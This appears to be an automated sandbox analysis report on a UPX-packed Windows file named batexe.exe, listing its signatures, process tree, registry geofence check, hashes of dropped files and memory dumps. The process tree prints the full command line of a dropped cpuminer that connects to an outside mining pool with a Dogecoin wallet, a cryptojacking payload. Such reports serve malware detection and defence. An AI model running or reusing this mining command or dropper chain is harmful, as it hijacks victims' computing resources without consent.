73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 18:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1164	b2e.exe
2776	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2776	cpuminer-sse2.exe
2776	cpuminer-sse2.exe
2776	cpuminer-sse2.exe
2776	cpuminer-sse2.exe
2776	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2568-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2568 wrote to memory of 1164	2568	batexe.exe	85
PID 2568 wrote to memory of 1164	2568	batexe.exe	85
PID 2568 wrote to memory of 1164	2568	batexe.exe	85
PID 1164 wrote to memory of 5104	1164	b2e.exe	88
PID 1164 wrote to memory of 5104	1164	b2e.exe	88
PID 1164 wrote to memory of 5104	1164	b2e.exe	88
PID 5104 wrote to memory of 2776	5104	cmd.exe	89
PID 5104 wrote to memory of 2776	5104	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2568
- C:\Users\Admin\AppData\Local\Temp\613A.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\613A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\613A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6496.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5104
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\613A.tmp\b2e.exe

Filesize
396KB

MD5
6fbe31decec22b4d02b1c4bba4bbae08

SHA1
f192d13430a4282f5bb35694d10587ca8f36b7e3

SHA256
7c71b9f99617e9568337634e2de3a4d07ec3a05cdb3e581e51cf25cdbd562b37

SHA512
d4eda725c770e01c35dec402b6fcc0163a3b5e97784dbc121f5d9b4abd9c399c3ce79ea7a55719dba5685267bbfd460cb9b16eec3f3da4e57cf276ccf9fba956

Download Submit
C:\Users\Admin\AppData\Local\Temp\613A.tmp\b2e.exe

Filesize
1.2MB

MD5
f92a6fd821c5be29c37f605e3eb804d6

SHA1
565721c2509a3fe91929c022a1871db93805e425

SHA256
efc9efd1122d45fef8685e8b47fd880565baca2bf2b199154c5650ca27b4b799

SHA512
28a2ef0efd568944a8a887fb08dd2f2bb4f09983bf6208d1ff5fa4275927da71ec6a9073baf6e3c994877ee8d198aa79c60aed5e6d2db0cb4e59d10a4b584ac4

Download Submit
C:\Users\Admin\AppData\Local\Temp\613A.tmp\b2e.exe

Filesize
1.1MB

MD5
1b964912d95052d48cce39814d1c02f1

SHA1
5e975301e7b26bfbe642b380f0187113cde6dae1

SHA256
6064179fab6e0018c58c2b841a652a6a029249b1afc6e1bf9d7320e542561776

SHA512
df18be3e509d0fbb277adbe1a2f2148f3ce04121c6504ce7d3d11619be36bdda4c7e35801bf130a8a1845c094e566ba27ac8585ba7e8c6206ed9174b4c1ee208

Download Submit
C:\Users\Admin\AppData\Local\Temp\6496.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
649KB

MD5
9d19dfea4e839ffd58e2fef26a66cd25

SHA1
c871b7ea3691385c3d9da3bc593d7ef61a9db1e1

SHA256
f90e9f9d32b51a02cb3ea57ea8c404587ff723e6f5caace6e18df41a1da196c7

SHA512
832460957b2a82be9e644b9c29d7c22fca525be446c0a9115a2457223b070cd351b971d0210a1d4d400b86bc8b4789c5311d67dbbc7f01ac24bf98799ec6431e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
487KB

MD5
aa2d07b699f67a85a33b7b9dd979ec1c

SHA1
1c63fab5189a0c6119952870c0f94562096bd4b4

SHA256
b0831274dea13eb279ddd81717dc49d1227176f6889cd901f509685680411249

SHA512
18cf064c5bf99d8b7a28fed125fdca3a639118e3dc71533877a86bed633779c82a68f64c842efc0337dabc647b425657dcea242a7054495362b02e7daf4a9c5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
563KB

MD5
afdbb1ada042b17cd89065d51af6f818

SHA1
83452798c42d9fa39c1402e08d00fb3e7b4fc3d9

SHA256
480fab2d8fe6b5f2d0777e07c9620d625ec1717523fa7c5db5c2d58374d95238

SHA512
696c38c23de1a28092ce914232f531eae7815371b288473f72fa2f00d1d526ba13c91234510dff2fb0f8e3b7b2493bad51a3725ad59c79ec75d3988d5987a7d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
457KB

MD5
4c8117fd8bc7b6f9a6b40bd5d92b7336

SHA1
be46e80caddc1fb7801e2158d884c2ab13cade4d

SHA256
f03a557e537c962e606da7dfb538f77bdc39e961fa8e5e2c9c35ed451f68aea9

SHA512
ccfee9305bf183c307035e3d522505cb538b37acc1268b6ace1a1a300c5745d746b05545de34c994b875768b2e93053df454c578a54a09f6170ca084946f7684

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
309KB

MD5
e07357bac3264fbc1fd80b5254e319a5

SHA1
2a3a4574210fc3414a6e3e2dddf724ec1652a480

SHA256
c04426ec6216bd117fd6d2105b3a23d9f0cd08272cf7dd2f4fba4c317aa460d6

SHA512
d9fafef0c31b07f2d726664820eb7145bb81e0107787302b1d7c35909de76d7402e3f2f0b5cc0668140b8b74e1b2b8b34625630c6a892095a3386d1720a077c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
756KB

MD5
eeeffc7a95ac5a4d410ca79b39ce3048

SHA1
18ee48ad593aa684c9bb9be00af02b0aa48bf6f3

SHA256
a9cf95cf615bb450f2feda465a9bd2a4a3dad3efc3d8ca26e37e3fcd5c716828

SHA512
a430bef1cd5bf280cbec9c4a77d80457f18eb0d6a890c94a3d8ee1a05aa1ac79e633af42d806a34b03e41f89850805821dd18a15f6d7a1124340357b8731de51

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
640KB

MD5
1b7339cbcb5b756c15c05fe0cc6443f3

SHA1
abdba01c4526a9bbbb7fd3853e09bce3cbb5287d

SHA256
5fcf0fb116f77206758e3a669ec4fa52648fae431a5c2aa2d7ee69944142e019

SHA512
7661b5e8413e74432a00089b1556b2f49e268b6b5c8cefd839cbe19074bffd138c18e8078627420f4082f579a9e3f8d02b199507ae36380b5375162a4d4ba439

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
478KB

MD5
f54de057ab83ad10a643b41cd085bc9b

SHA1
aaf0050eddad8d3480ac9b4ef24517484ab1c49e

SHA256
5410c99577f62783d5e6b1029643002ac2fb2a627457d16862aeb55e7aa1bd32

SHA512
378573f190915d46414905c416759debd6a27362ff3d00af4885c766605f32ef80da197a52098cb10b18206b1aac0be872dcbb05f3e00a8322c89b97c8d7c983

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
485KB

MD5
60a3ea7807e7c583006fc8104947d37a

SHA1
2ebcdb98512fb9ed0a3af0de8fbb8ef6f8dcc9b8

SHA256
83ea4af23062c4351f88e31db9433daacea9ba47ea42c898b670a46453a97f6c

SHA512
487f5ec426c59f1f4a199066ee45d61396af2d4e0539ca7fcf40a31846b5c04116bf53d3b02818db5894c4470ebb22b00b2ac6419da981ca93661aad8f52dc95

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
544KB

MD5
855f7eca73aad9adb20126e5e770be36

SHA1
9ceb723acf670c272231d6dd5d0cba94edd14b5b

SHA256
ee17b08d7e0290b9dd5c48a0a3058982d5cb93be39554a58cc5a1d7fa10165f0

SHA512
406d00eacceba89615417f999659da79b2c4417ab45de70e23a0778e9dee3efb2e4742b0ada7b1fa40a8b551b13b8278c9ed72615237e919ec1ea4937bb631f0

Download Submit
memory/1164-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1164-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2568-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2776-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2776-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2776-47-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/2776-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-46-0x0000000062FE0000-0x0000000063078000-memory.dmp

Filesize
608KB

Download
memory/2776-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2776-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download